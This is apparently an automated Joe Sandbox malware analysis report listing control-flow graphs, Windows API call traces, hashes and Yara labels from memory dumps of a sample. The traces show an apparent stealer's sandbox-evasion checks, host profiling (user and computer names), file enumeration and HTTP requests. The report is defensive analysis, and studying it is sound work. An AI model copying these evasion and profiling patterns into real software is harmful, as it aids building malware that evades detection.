                                                  control_flow_graph 1344 b3003c-b30047 1345 b30049 1344->1345 1346 b3004c-b30263 call b30a3f call b30e0f call b30d90 VirtualAlloc 1344->1346 1345->1346 1361 b30265-b30289 call b30a69 1346->1361 1362 b3028b-b30292 1346->1362 1366 b302ce-b303c2 VirtualProtect call b30cce call b30ce7 1361->1366 1363 b302a1-b302b0 1362->1363 1365 b302b2-b302cc 1363->1365 1363->1366 1365->1363 1373 b303d1-b303e0 1366->1373 1374 b303e2-b30437 call b30ce7 1373->1374 1375 b30439-b304b8 VirtualFree 1373->1375 1374->1373 1377 b305f4-b305fe 1375->1377 1378 b304be-b304cd 1375->1378 1380 b30604-b3060d 1377->1380 1381 b3077f-b30789 1377->1381 1379 b304d3-b304dd 1378->1379 1379->1377 1385 b304e3-b30505 LoadLibraryA 1379->1385 1380->1381 1386 b30613-b30637 1380->1386 1383 b307a6-b307b0 1381->1383 1384 b3078b-b307a3 1381->1384 1388 b307b6-b307cb 1383->1388 1389 b3086e-b308be LoadLibraryA 1383->1389 1384->1383 1390 b30517-b30520 1385->1390 1391 b30507-b30515 1385->1391 1392 b3063e-b30648 1386->1392 1393 b307d2-b307d5 1388->1393 1396 b308c7-b308f9 1389->1396 1394 b30526-b30547 1390->1394 1391->1394 1392->1381 1395 b3064e-b3065a 1392->1395 1397 b307d7-b307e0 1393->1397 1398 b30824-b30833 1393->1398 1399 b3054d-b30550 1394->1399 1395->1381 1400 b30660-b3066a 1395->1400 1401 b30902-b3091d 1396->1401 1402 b308fb-b30901 1396->1402 1403 b307e2 1397->1403 1404 b307e4-b30822 1397->1404 1408 b30839-b3083c 1398->1408 1405 b305e0-b305ef 1399->1405 1406 b30556-b3056b 1399->1406 1407 b3067a-b30689 1400->1407 1402->1401 1403->1398 1404->1393 1405->1379 1409 b3056f-b3057a 1406->1409 1410 b3056d 1406->1410 1411 b30750-b3077a 1407->1411 1412 b3068f-b306b2 1407->1412 1408->1389 1413 b3083e-b30847 1408->1413 1415 b3059b-b305bb 1409->1415 1416 b3057c-b30599 1409->1416 1410->1405 1411->1392 1417 b306b4-b306ed 1412->1417 1418 b306ef-b306fc 1412->1418 1419 b3084b-b3086c 1413->1419 1420 b30849 1413->1420 1427 b305bd-b305db 1415->1427 1416->1427 1417->1418 1421 b3074b 1418->1421 1422 b306fe-b30748 1418->1422 1419->1408 1420->1389 1421->1407 1422->1421 1427->1399
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00B3024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: fcc73cd86eda98ef9d49f7de9936cacedc878e6531222c75fccab74fe3dd0bce
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: 5B527874A11229DFDB64CF58C995BA8BBB1BF09304F1480E9E90DAB351DB30AE85DF14

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00848748), ref: 004198A1
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00848A60), ref: 004198BA
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00848A78), ref: 004198D2
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00848A18), ref: 004198EA
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00848AA8), ref: 00419903
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,008499C8), ref: 0041991B
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,008468E8), ref: 00419933
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00846928), ref: 0041994C
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00848A30), ref: 00419964
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00848A90), ref: 0041997C
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00848AC0), ref: 00419995
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00848A00), ref: 004199AD
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00846B48), ref: 004199C5
                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00848A48), ref: 004199DE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                    • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                    • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                    • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                    • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                    • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                    • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                    • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                    • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                  • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                    • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00849958,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                  • CloseHandle.KERNEL32(?,00000000,?,00849958,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 3511611419-0
                                                  • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                  • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                  • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                  • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                                  Control-flow Graph

                                                  APIs
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$CrackInternetlstrlen
                                                  • String ID: <
                                                  • API String ID: 1683549937-4251816714
                                                  • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                  • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                  • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                  • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1498 401281-401285 1496->1498 1497->1498 1500 401287 1498->1500 1501 40129a-40129d 1498->1501 1503 401292-401294 ExitProcess 1500->1503 1504 401289-401290 1500->1504 1504->1501 1504->1503
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                  • __aulldiv.LIBCMT ref: 00401258
                                                  • __aulldiv.LIBCMT ref: 00401266
                                                  • ExitProcess.KERNEL32 ref: 00401294
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                  • String ID: @
                                                  • API String ID: 3404098578-2766056989
                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1517 416af5-416b04 CloseHandle Sleep 1510->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1510->1518 1517->1508 1518->1511
                                                  APIs
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00849958,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                  • CloseHandle.KERNEL32(?,00000000,?,00849958,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                  • String ID:
                                                  • API String ID: 941982115-0
                                                  • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                  • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                  • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                  • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0087B030), ref: 00406303
                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0087A1B8,00000000,00000000,00400100,00000000), ref: 00406385
                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                  • String ID: ERROR$ERROR
                                                  • API String ID: 3287882509-2579291623
                                                  • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                  • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                  • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                  • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocComputerNameProcess
                                                  • String ID:
                                                  • API String ID: 4203777966-0
                                                  • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                  • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                  • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                  • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                  • ExitProcess.KERNEL32 ref: 00401143
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                  • String ID:
                                                  • API String ID: 1103761159-0
                                                  • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                  • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                  • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                  • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0084B36E
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0084B38E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279927835.000000000084A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_84a000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: c57d843ad1b61a5430d41485e3e1e48a100a3b39596ff716120beb052fa8b1b5
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: 32F062311007186BD7203EFAA88DA6AB6E8FF49725F100528F646D21C0DB70EC454661
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000400,?,?,00B30223,?,?), ref: 00B30E19
                                                  • SetErrorMode.KERNEL32(00000000,?,?,00B30223,?,?), ref: 00B30E1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: 79317f1e03a7b00afff74698781a3841a1ac579bd50c92b6688da056f814f96d
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: 86D01232645228B7DB003A94DC09BCEBB5CDF09BA2F108461FB0DE9080CBB09A4046EA
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocFree
                                                  • String ID:
                                                  • API String ID: 2087232378-0
                                                  • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                  • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                  • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                  • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                  APIs
                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                  • ExitProcess.KERNEL32 ref: 004011C6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                                  • String ID:
                                                  • API String ID: 1004333139-0
                                                  • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                  • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                  • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                  • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0084B056
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279927835.000000000084A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_84a000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: 1a5c8a514dd99c47ee342d814f2e94713a372c556a105c62a5516595575596f8
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: CA113C79A00208EFDB01DF98C985E99BBF5EF08351F058094F9489B362D371EA50DF80
                                                  APIs
                                                  • wsprintfA.USER32 ref: 004138CC
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
